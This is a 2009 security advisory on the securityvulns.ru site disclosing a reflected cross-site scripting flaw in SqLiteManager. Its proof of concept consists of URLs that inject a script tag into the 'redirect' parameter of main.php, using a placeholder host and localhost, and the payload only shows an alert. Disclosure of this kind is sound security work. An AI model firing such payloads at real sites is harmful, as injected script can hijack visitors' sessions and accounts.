Computer Security

Security Advisory: XSS in SqLiteManager
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [NGENUITY] - Spiceworks Multiple Vulnerabilities (XSS & CSRF)

  [NGENUITY] - Ticket Subject Persistent XSS in Kayako SupportSuite

  [RT-SA-2009-005] Papoo CMS: Authenticated Arbitrary Code Execution

  Vulnerability in Dumb math captcha for WordPress

From:hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:10.08.2009
Subject:XSS in SqLiteManager


###########################################
#
# SqLiteManager ( All Version ) Cross Site Scripting
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi@gmail.com
#
# Download :
http://downloads.sourceforge.net/project/sqlitemanager/sqlitemanager/1.2.0/SQLite
Manager-1.2.0.zip?use_mirror=heanet
#
###########################################

PoC :

http://[www.example.com]/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>

http://[www.example.com]/[PATH]/main.
php?redirect=<script>alert('Hadi Kiamarsi')</script>


local Example :


http://localhost/main.php?redirect=<script>alert('Hadi Kiamarsi')</script>
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server